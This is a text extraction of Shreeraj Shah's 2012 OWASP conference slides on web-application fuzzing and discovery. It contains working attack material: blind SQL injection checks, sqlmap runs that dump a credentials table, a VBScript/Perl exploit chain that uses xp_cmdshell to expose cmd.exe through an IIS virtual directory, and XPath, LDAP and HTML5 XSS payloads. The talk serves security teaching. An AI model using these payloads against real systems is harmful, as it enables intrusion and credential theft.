FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

FIND ME IF YOU CAN – SMART FUZZING AND
DISCOVERY

SHREERAJ SHAH

OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon

Who Are We? http://shreeraj.blogspot.com
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
shreeraj@blueinfy.com
http://www.blueinfy.com
http://www.blueinfy.com
• Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
• Past experience
– Net Square, Chase, IBM & Foundstone
• Interest
– Web security research
• Published research
– Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories - .Net, Java servers etc.
• Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking


Well Known Fact!
• 90% of sites are vulnerable to one or more
vulnerabilities.
• Exploitable ? – YES!
• Most popular ones are – SQLi & XSS
• SQLi – complete compromise of the
application …
• XSS – Control over browser and exploitation


Traditional Fuzzing – Not working
• Enterprise running on 2.0 wave - Portal
• Technologies & Components – Dojo, Ajax, XML
Services, Blog, Widgets
• Scan with tools/products failed
• Security issues and hacks
– SQL injection over XML
– Ajax driven XSS
– Several XSS with Blog component
– Several information leaks through JSON fuzzing
– CSRF on both XML and JS-Array
» HACKED
» DEFENSE

AppSec – Past, Present …

Source - OWASP
5

Enterprise Technology Trend
• 2007. Web services would rocket from $1.6
billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented
Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating
deeper into the corporate environment
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.


Architecture
Documents

News Weather

Mails Bank/Trade
Browser Internet
RSS feeds
Ajax
RIA (Flash) Internet Web 2.0 Start
HTML / JS / DOM

Blog Database Authentication

Application
Infrastructure
Web Services
End point


Environment
Internet DMZ Trusted

SOAP/JSON etc.
Mobile
Web 2.0 W
Services E
Scripted Application B
Web Web Servers S
Server Engine And E
Web Static pages only Dynamic pages
(HTML,HTM, etc.) (ASP,DHTML, PHP, Integrated R
Client CGI, etc.) Framework V

X
I
ASP.NET on C
.Net Framework, E
J2EE App Server, S
Web Services,
DB etc.

Internal/Corporate

Stack/Logic - Layers • Android
• iPhone/Pad
• HTML • Other
5
• Storage • Flash
Mobile • AMF
• WebSocket
• DOM
• WebSQL •
• JS • Storage Flex
• XHR • XAML
Server side
Components • Silverlight • WCF

Presentation Layer • NET

Business Layer
Client side
Data Access Layer Components
Authentication (Browser)
Communication etc.

Runtime, Platform, Operating System Components


Browser & Mobile – Arch.
Mobile

HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation

JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage

XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access

SOP/CORS Sandbox Core
Policies


Case study - Pageflakes


Case study - Pageflakes
Widgets

Web Services


FUZZING & DISCOVERY


OWASP’s Risk Picture


Methodology, Scan and Attacks

Assets

Footprinting & Discovery
Config Scanning
Enumeration & Crawling
Code Scanning
Attacks and Scanning

Black White
Secure Coding

Web Firewall
Defense

Secure Assets


Discovery
JSON

XML JS-Script

JS-Object
JS-Array


Attack & Entry


GET/POST
GET /login.aspx?username=shah HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.1) Gecko/2008070208
Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

POST http://example.com/cgi-bin/search.cgi HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,
*/*;q=0.5
Keep-Alive: 300
Referer: http://example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

search=searchtext


XML-RPC
POST /trade-rpc/getquote.rem HTTP/1.0
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xmlrpc.example.com
Content-Type: text/xml
Content-Length: 161
<?xml version="1.0"?>
<methodCall>
<methodName>stocks.getquote</methodName>
<params>
<param><value><string>MSFT</string></value></param>
</params>
</methodCall>


SOAP
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getQuotes xmlns="http://tempuri.org/">
<compid>MSFT</compid>
</getQuotes>
</soap:Body>
</soap:Envelope>


REST
<?xml version="1.0"?>
<p:Laptops xmlns:p="http://laptops.example.com"
xmlns:xl="http://www.w3.org/1999/xlink">
<Laptop id="0123" xl:href="http://www.parts-depot.com/laptops/0123"/>
< Laptop id="0348" xl:href="http://www.parts-depot.com laptops /0348"/>
< Laptop id="0321" xl:href="http://www.parts-depot.com/ laptops /0321"/>
…
…
</p:Laptops>


JSON
message = {
from : "john@example.com",
to : "jerry@example.com",
subject : "I am fine",
body : "Long message here",
showsubject : function(){document.write(this.subject)}
};


HIDDEN DISCOVERY


Ajax driven site


Crawling with Ruby/Watir


Attacker’s approach
• Fuzzing over HTTP
• Injecting faults with various set of payload
• Try to raise the exception
• Exception throw message back as part of HTTP
response
• Scanning response for signatures
• If signature found, it becomes interesting
entry for exploitation

Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Entry points are multiple
• Traditional fuzzing will not work
• Auto assessment can be challenge
• Behavioral assessment with Artificial
intelligence


Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!

http://192.168.7.120/details.asp?id= ‘3

select * from items where product_id = ‘3

DB


Error – Now? – forget it
• Premature SQL query termination

We now have an
SQL injection point.


Blind SQL Injection
• We have SQL injection point but it is not throwing any error message out
as part of its response. Application is sending customized error page
which is not revealing any signature by which we can deduce potential
SQL flaw.
• Knowing SQL injection point or loophole in web application, xp_cmdshell
seems to be working. But we can’t say is it working or not since it doesn’t
return any meaningful signature. This is “blind xp_cmdshell”.
• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from
the box to the Internet by which you can confirm execution of the
command on the target system.
• We don’t know the actual path to webroot so can’t copy file to location
which can be accessed over HTTP or HTTPS later to confirm the execution
of the command.
• If we know path to webroot and directory structure but can’t find execute
permission on it so can’t copy cmd.exe or any other binary and execute
over HTTP/HTTPS.


Checks…
• AND 1=1

• DBO check
http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo'

• Wait delay call
http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10'

• (SELECT+ASCII(SUBSTRING((a.loginame),1,1))
+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

• http://www.dvds4less.net/details.aspx?id=1+AND+
(SELECT+ASCII(SUBSTRING((a.loginame),1,1))
• http://www.dvds4less.net/details.aspx?id=1+AND+
(SELECT+ASCII(SUBSTRING((a.loginame),2,1))


Running tools
• SQL Map or Absinthe
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14


Enumeration…
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07


Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca
talog -T auth
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+


Blind Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo

http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell =
WScript.CreateObject("WScript.Shell") > c:secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo
>> c:secret.vbs’

http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’


Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set


Running…
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $path = $self->GetVar('RPATH');
my $vhost = $self->GetVar('VHOST');
my @url = split(/#/, $path);
my @payload =
("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'",
"EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'"
);
$self->PrintLine("[+] Sending SQL injection payload...");
for(my $count=0;$count<=6;$count++)
..


XPATH injection
• XPATH parsing standard error
• XPATH is method available for XML parsing
• MS SQL server provides interface and one can
get table content in XML format.
• Once this is fetched one can run XPATH
queries and obtain results.
• What if username/password parsing done on
using XPATH – XPATH injection


XPATH injection
string fulltext = "";
string coString =
"Provider=SQLOLEDB;Server=(local);database=order;User
ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag="Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
string credential = "//users[@username='"+user+"' and
@password='"+pass+"']";
XmlNodeList xmln = doc.SelectNodes(credential);
string temp;
if(xmln.Count > 0)
{
//True
}
else //false

XPATH injection
string credential =
"//users[@username='"+user+"' and
@password='"+pass+"']";
• XPATH parsing can be leveraged by
passing following string ' or 1=1 or ''=‘
• This will always true on the first node and
user can get access as who ever is first
user.
Bingo!

LDAP Injection

Resource viewer :
http://www.something.com/res.cgi?type=1)(uid=*))

•Notice the injection
•Attacker bypasses the user id check
•(S)he can view all machines now


SOAP – INJECTIONS & FUZZING


Fetching Calls
• Identifying services layer calls


Technology Identification
• Location can be obtained from UDDI
as well, if already published.
• WSDL location [ Access Point ]

http://192.168.11.2/ws/dvds4less.asmx?wsdl

.asmx – indicates
.Net server from MS


SOAP request SOAP
Envelope

<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>

Input to the
method
Method
Call

SOAP response SOAP
Envelope

<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>

Output to the
method Method
response


HTML5 & CLIENT SIDE FUZZING


HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas
(getImageData), menu, embed,
buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox,
manifest, rel etc.
• Events/Objects – Navigation (_self), Editable
content, Drag-Drop APIs, pushState (History)
etc.
49

HTML5 – XSS
• Blacklist and filter will get bypassed
• Lot of new signatures and possible ways to
execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payload

50

XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)“>
– <video onerror="javascript:alert(1)"><source>

51

XSS variants
• Exploiting autofocus
– <input autofocus onfocus=alert(1)>
– <select autofocus onfocus=alert(1)>
– <textarea autofocus onfocus=alert(1)>
– <keygen autofocus onfocus=alert(1)>

52

XSS variants
• MathML issues
– <math
href="javascript:alert(1)">CLICKME</math>
– <math> <maction
actiontype="statusline#http://Blueinfy.com"
xlink:href="javascript:alert(1)">CLICKME</mactio
n> </math>

53

XSS variants
• Form & Button etc.
– <form id="test" /><button form="test"
formaction="javascript:alert(1)">test
– <form><button
formaction="javascript:alert(1)">test

• Etc … and more …

54

DOM BASED INJECTIONS


DOM with HTML5


DOM based XSS - Messaging
• It is a sleeping giant in the Ajax applications
coupled with Web Messaging
• Root cause
– DOM is already loaded
– Application is single page and DOM remains same
– New information coming needs to be injected in using
various DOM calls like eval()
– Information is coming from untrusted sources
– JSONP usage
– Web Workers and callbacks


AJAX with HTML5 – DOM
• Ajax function would be making a back-end call
• Back-end would be returning JSON stream or
any other and get injected in DOM
• In some libraries their content type would
allow them to get loaded in browser directly
• In that case bypassing DOM processing…


APIs …
• HTML5 few other APIs are interesting from
security standpoint
– File APIs – allows local file access and can mixed
with ClickJacking and other attacks to gain client
files.
– Drag-Drop APIs – exploiting self XSS and few other
tricks, hijacking cookies …
– Lot more to explore and defend…


CONCLUSION & QUESTIONS


FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

Similar to FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY (20)

More from Shreeraj Shah

More from Shreeraj Shah (6)

Recently uploaded

Recently uploaded (20)

FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

Editor's Notes